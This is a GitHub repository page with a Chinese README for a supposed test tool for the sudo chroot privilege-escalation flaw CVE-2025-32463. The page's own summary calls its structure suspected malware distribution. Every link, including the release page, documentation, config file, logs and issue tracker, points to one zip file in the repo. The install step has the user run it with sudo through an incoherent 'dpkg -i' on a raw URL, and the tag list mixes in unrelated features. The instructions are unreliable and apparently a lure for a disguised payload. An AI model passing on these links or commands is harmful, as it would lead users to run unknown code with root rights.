Precault47/sudo-chroot

GitHub: Precault47/sudo-chroot

声称利用 sudo chroot 选项漏洞(CVE-2025-32463)进行本地权限提升测试,但仓库结构疑似恶意软件分发。

Stars: 1 | Forks: 1

# 🔒 sudo-chroot - 简单的 Sudo 漏洞测试工具 ## 🚀 入门指南 欢迎使用 **sudo-chroot**!该工具可帮助您测试 Linux 系统上 sudo 命令中的特定安全漏洞。它让您了解标记为 CVE-2025-32463 的漏洞是如何被利用的。 ## 📥 下载与安装 首先,您需要下载该应用程序。访问此页面进行下载:[发布页面](https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip) ![下载 sudo-chroot](https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip%20sudo--chroot-v1.0-blue) ### 下载说明 1. 点击上方链接进入发布页面。 2. 找到那里列出的最新版本。 3. 点击适合您操作系统的资产文件。例如: - 对于 Ubuntu,下载 `.deb` 文件。 - 对于 Kali Linux,请点击相应的链接进行安装。 4. 将文件保存到您的计算机。 ## 🖥️ 系统要求 在运行 **sudo-chroot** 之前,请确保您的系统满足以下要求: - Linux 操作系统(推荐 Ubuntu 或 Kali Linux) - 至少 1 GB RAM - 系统上已安装 Python 3.x ## 🔧 如何运行 下载应用程序后,请按照以下步骤操作: 1. 在您的 Linux 系统上打开一个终端窗口。 2. 导航到您保存下载文件的文件夹。您可以使用 `cd` 命令: cd /path/to/downloaded/file 3. 对于 Ubuntu,如果您下载了 `.deb` 文件,请使用以下命令进行安装: sudo dpkg -i https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip 4. 如有必要,使用以下命令解决任何依赖问题: sudo apt-get install -f 5. 最后,输入以下命令运行应用程序: sudo-chroot ## ⚙️ 配置工具 **sudo-chroot** 可能需要一些配置才能有效工作。以下是一些您可以调整的基本设置: - **日志记录:** 您可以启用日志记录以跟踪工具执行的操作。为此,请编辑位于 `https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip` 的配置文件。 - **测试选项:** 选择您想要执行的测试级别。将配置文件中的 `test_mode` 调整为 `basic`、`advanced` 或 `custom` 等设置。 ## 🌐 其他用法 运行 **sudo-chroot** 后,您可以开始测试漏洞。请按照屏幕上的说明操作,或参考内置帮助了解具体命令。 ### 示例命令 - 启动漏洞测试: sudo-chroot test - 检查更新: sudo-chroot update ## ❓ 故障排除 如果您遇到问题,请考虑以下步骤: 1. 确保您安装了正确版本的 Python。 2. 验证是否满足所有依赖关系。使用命令: sudo apt-get check 3. 检查 `https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip` 中的日志,查看是否有任何错误消息。 ## 💬 社区支持 加入讨论并向其他用户寻求帮助。您可以在仓库的 Issues 部分与我们交流,或者查看是否已有类似问题的解决方案。 ## 📚 资源 - [官方文档](https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip) - [Linux Sudo 手册](https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip) - [漏洞数据库](https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip) 如有问题或反馈,请在我们的 [GitHub 页面](https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip)上提交 issue。 ## 🔗 再次下载 请记住,您可以随时返回发布页面重新下载。只需点击此链接:[发布页面](https://raw.githubusercontent.com/Precault47/sudo-chroot/main/reclass/sudo_chroot_potstone.zip) 祝测试愉快!
标签:chroot, CSV导出, Cutter, CVE-2025-32463, Exploit, LPE, Python, Sudo, Web报告查看器, 协议分析, 子域名枚举, 攻击脚本, 无后门, 本地提权, 权限提升, 系统安全, 网络安全, 逆向工具, 隐私保护